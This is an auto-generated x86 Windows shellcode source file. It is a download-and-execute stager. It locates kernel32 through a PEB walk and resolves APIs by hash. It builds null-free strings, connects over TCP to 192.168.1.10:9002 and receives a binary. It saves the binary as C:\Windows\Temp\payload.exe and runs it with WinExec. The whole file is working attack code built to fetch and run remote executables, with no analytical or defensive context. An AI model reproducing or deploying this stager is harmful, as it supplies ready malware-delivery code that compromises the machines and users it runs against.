; AUTO-GENERATED by emitter-v1
; Manifest: Tools/emitter/manifests/tcp_download.yaml
; Template: TcpDownloadTemplate
; Generated: 2026-06-28 15:57:55

    _start:
        jmp main

; ── Framework Stubs ────────────────────────────────────────────────

find_module:
    call get_first_ldr_entry
    jmp find_kernel32_entry

get_first_ldr_entry:
    xor ecx, ecx
    mov eax, fs:[ecx + 0x30]
    mov eax, [eax + 0x0c]
    mov eax, [eax + 0x1c]
    sub eax, 0x10
    ret

find_kernel32_entry:
    mov esi, [eax + 0x30]
    cmp word ptr [esi], 0x004b
    jne next
    cmp word ptr [esi+2], 0x0045
    jne next
    cmp word ptr [esi+12], 0x0033
    jne next
    mov ebx, [eax + 0x18]
    ret

next:
    mov eax, [eax + 0x10]
    sub eax, 0x10
    jmp find_kernel32_entry

get_export_directory:
    mov eax, [ebx+0x3c]
    add eax, ebx
    mov eax, [eax+0x78]
    add eax, ebx
    ret

get_export_tables:
    mov ecx, [eax+0x18]
    mov edi, [eax+0x20]
    add edi, ebx
    mov edx, [eax+0x24]
    add edx, ebx
    mov esi, [eax+0x1c]
    add esi, ebx
    ret

save_export_context:
    mov [ebp-0x04], ebx
    mov [ebp-0x08], edi
    mov [ebp-0x0c], edx
    mov [ebp-0x10], esi
    mov [ebp-0x14], ecx
    ret

resolve_export_by_hash:
    mov [ebp-0x18], eax
    xor ecx, ecx

find_export_loop:
    mov edi, [ebp - 0x08]
    mov eax, [edi + ecx*4]
    add eax, [ebp - 0x04]
    mov esi, eax
    call compute_hash
    cmp edx, [ebp-0x18]
    je resolve_matched_export

inc_next:
    inc ecx
    cmp ecx, [ebp - 0x14]
    jl find_export_loop

compute_hash:
    xor eax, eax
    xor edx, edx
    cld

hash_loop:
    lodsb
    test al, al
    jz hash_done
    ror edx, 0x0d
    movzx eax, al
    add edx, eax
    jmp hash_loop

hash_done:
    ret

resolve_matched_export:
    mov edx, [ebp - 0x0c]
    movzx eax, word ptr [edx + ecx*2]
    mov esi, [ebp - 0x10]
    mov eax, [esi + eax*4]
    add eax, [ebp - 0x04]
    ret

; ── Main ───────────────────────────────────────────────────────────

main:
    mov  ebp, esp
    add  esp, 0xfffffb00

    ; Bootstrap: find kernel32 via PEB walk
    call find_module
    call get_export_directory
    call get_export_tables
    call save_export_context

; ── kernel32.dll (peb) ────────────────────────────────────────────

    ; LoadLibraryA  [ebp-0x28]
    mov  eax, 0xec0e4e8e
    call resolve_export_by_hash
    mov  [ebp-0x28], eax

    ; VirtualAlloc  [ebp-0x40]
    mov  eax, 0x91afca54
    call resolve_export_by_hash
    mov  [ebp-0x40], eax

    ; CreateFileA  [ebp-0x44]
    mov  eax, 0x7c0017a5
    call resolve_export_by_hash
    mov  [ebp-0x44], eax

    ; WriteFile  [ebp-0x48]
    mov  eax, 0xe80a791f
    call resolve_export_by_hash
    mov  [ebp-0x48], eax

    ; CloseHandle  [ebp-0x4c]
    mov  eax, 0x0ffd97fb
    call resolve_export_by_hash
    mov  [ebp-0x4c], eax

    ; WinExec  [ebp-0x50]
    mov  eax, 0x0e8afe98
    call resolve_export_by_hash
    mov  [ebp-0x50], eax

    ; ExitProcess  [ebp-0x54]
    mov  eax, 0x73e2d87e
    call resolve_export_by_hash
    mov  [ebp-0x54], eax

; ── Loading ws2_32.dll via LoadLibraryA ──────────────────────────────────

; emit_push: "ws2_32.dll" (null-safe)
; ESP = pointer to "ws2_32.dll\0" after pushes

    push 0x01016d6d
    xor  dword [esp], 0x01010101
    push 0x642e3233
    push 0x5f327377
    mov  esi, esp        ; ESI = "ws2_32.dll"
    push esi                    ; lpLibFileName = &ws2_32.dll
    call dword ptr [ebp-0x28]
    mov  [ebp-0x24], eax    ; ws2_32.dll base
    add  esp, 0x0c           ; pop string from stack

    mov  ebx, [ebp-0x24]
    call get_export_directory
    call get_export_tables
    call save_export_context

; ── ws2_32.dll (LoadLibraryA) ─────────────────────────────────────

    ; WSAStartup  [ebp-0x2c]
    mov  eax, 0x3bfcedcb
    call resolve_export_by_hash
    mov  [ebp-0x2c], eax

    ; WSASocketA  [ebp-0x30]
    mov  eax, 0xadf509d9
    call resolve_export_by_hash
    mov  [ebp-0x30], eax

    ; connect  [ebp-0x34]
    mov  eax, 0x60aaf9ec
    call resolve_export_by_hash
    mov  [ebp-0x34], eax

    ; recv  [ebp-0x38]
    mov  eax, 0xe71819b6
    call resolve_export_by_hash
    mov  [ebp-0x38], eax

    ; closesocket  [ebp-0x3c]
    mov  eax, 0x79c679e7
    call resolve_export_by_hash
    mov  [ebp-0x3c], eax

; ── String Construction ─────────────────────────────────────────────

; --- dst_path: "C:\Windows\Temp\payload.exe" (mov) ---
    lea  edi, [ebp-0x22c]
; emit_mov: "C:\Windows\Temp\payload.exe" (null-safe)
; 28 bytes written to [edi]

    mov  eax, 0x575c3a43
    mov  [edi], eax
    mov  eax, 0x6f646e69
    mov  [edi+0x4], eax
    mov  eax, 0x545c7377
    mov  [edi+0x8], eax
    mov  eax, 0x5c706d65
    mov  [edi+0xc], eax
    mov  eax, 0x6c796170
    mov  [edi+0x10], eax
    mov  eax, 0x2e64616f
    mov  [edi+0x14], eax
    mov  eax, 0x01647964
    xor  eax, 0x01010101  ; decode → 0x00657865
    mov  [edi+0x18], eax

; ── Structure Initialization ────────────────────────────────────────

; --- WSADATA at [ebp-0x80] (0x190 bytes) ---
; No initialization needed — WSAStartup writes output to [ebp-0x80].

; --- sockaddr_in at [ebp-0x210] (0x10 bytes) ---
; sin_port and sin_addr are set by the payload template.

    xor  eax, eax
    lea  edi, [ebp-0x210]
    mov  [edi+0x00], eax
    mov  [edi+0x04], eax
    mov  [edi+0x08], eax
    mov  [edi+0x0c], eax

    ; sin_family = AF_INET
    mov  word ptr [edi], 0x0002

    ; Template sets sin_port (+0x02) and sin_addr (+0x04) before connect()

; ── Payload ─────────────────────────────────────────────────────────

; ── TCP Download and Run Payload ───────────────────────────────────
; Server: 192.168.1.10:9002
; Writes to: C:\Windows\Temp\payload.exe
; Protocol: [uint32 LE size][raw bytes]

    ; WSAStartup(0x0202, &WSADATA)
    lea  esi, [ebp-0x80]
    push esi
    push 0x0202
    call dword ptr [ebp-0x2c]

    ; WSASocketA(AF_INET=2, SOCK_STREAM=1, IPPROTO_TCP=6, 0, 0, 0)
    xor  eax, eax
    push eax
    push eax
    push eax
    mov  al, 0x6
    push eax                    ; IPPROTO_TCP
    sub  al, 0x5
    push eax                    ; SOCK_STREAM
    inc  eax
    push eax                    ; AF_INET
    call dword ptr [ebp-0x30]
    mov  [ebp-0x58], eax

    ; sockaddr_in: sin_port and sin_addr (sin_family set by structure init)
    lea  edi, [ebp-0x210]
    mov  word ptr [edi+0x02], 0x2a23
    mov  dword ptr [edi+0x04], 0xc0a8010a

    ; connect(socket, &sockaddr_in, 0x10)
    lea  eax, [ebp-0x210]
    push 0x10
    push eax
    push dword ptr [ebp-0x58]
    call dword ptr [ebp-0x34]

    ; recv(socket, &bytes_total, 4, 0) — read 4-byte file size
    xor  eax, eax
    lea  ecx, [ebp-0x64]
    push eax                    ; flags = 0
    push 4                      ; len
    push ecx                    ; buf = &bytes_total
    push dword ptr [ebp-0x58]
    call dword ptr [ebp-0x38]

    ; VirtualAlloc(NULL, bytes_total, MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE)
    xor  eax, eax
    push 4                      ; PAGE_READWRITE
    mov  al, 0x30
    shl  eax, 8                 ; MEM_COMMIT|MEM_RESERVE = 0x3000
    push eax
    push dword ptr [ebp-0x64]
    xor  eax, eax
    push eax                    ; lpAddress = NULL
    call dword ptr [ebp-0x40]
    mov  [ebp-0x60], eax

    ; initialise bytes_recvd = 0
    xor  eax, eax
    mov  [ebp-0x68], eax

tcp_recv_loop:
    ; buf ptr = virt_buf + bytes_recvd
    mov  eax, [ebp-0x60]
    add  eax, [ebp-0x68]
    ; remaining = bytes_total - bytes_recvd
    mov  ecx, [ebp-0x64]
    sub  ecx, [ebp-0x68]
    xor  ebx, ebx
    push ebx                    ; flags = 0
    push ecx                    ; len = remaining
    push eax                    ; buf
    push dword ptr [ebp-0x58]
    call dword ptr [ebp-0x38]
    test eax, eax
    jle  tcp_recv_done          ; 0 = closed, negative = error
    add  [ebp-0x68], eax
    mov  eax, [ebp-0x68]
    cmp  eax, [ebp-0x64]
    jl   tcp_recv_loop

tcp_recv_done:
    ; closesocket(socket)
    push dword ptr [ebp-0x58]
    call dword ptr [ebp-0x3c]

    ; CreateFileA(dst_path, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS,
    ;             FILE_ATTRIBUTE_NORMAL, NULL)
    xor  ebx, ebx
    push ebx                    ; hTemplateFile = NULL
    push 0x80                   ; FILE_ATTRIBUTE_NORMAL
    push 2                      ; CREATE_ALWAYS
    push ebx                    ; lpSecurityAttributes = NULL
    push ebx                    ; dwShareMode = 0
    xor  eax, eax
    mov  al, 0x40
    shl  eax, 24               ; GENERIC_WRITE = 0x40000000
    push eax
    lea  eax, [ebp-0x22c]
    push eax                    ; lpFileName
    call dword ptr [ebp-0x44]
    mov  [ebp-0x5c], eax

    ; WriteFile(file_handle, virt_buf, bytes_total,
    ;           &bytes_recvd /* scratch */, NULL)
    xor  eax, eax
    push eax                    ; lpOverlapped = NULL
    lea  eax, [ebp-0x68]    ; scratch for lpNumberOfBytesWritten
    push eax
    push dword ptr [ebp-0x64]
    push dword ptr [ebp-0x60]
    push dword ptr [ebp-0x5c]
    call dword ptr [ebp-0x48]

    ; CloseHandle(file_handle)
    push dword ptr [ebp-0x5c]
    call dword ptr [ebp-0x4c]

    ; WinExec(dst_path, SW_SHOWNORMAL)
    lea  eax, [ebp-0x22c]
    push 1
    push eax
    call dword ptr [ebp-0x50]

hang:
    jmp hang
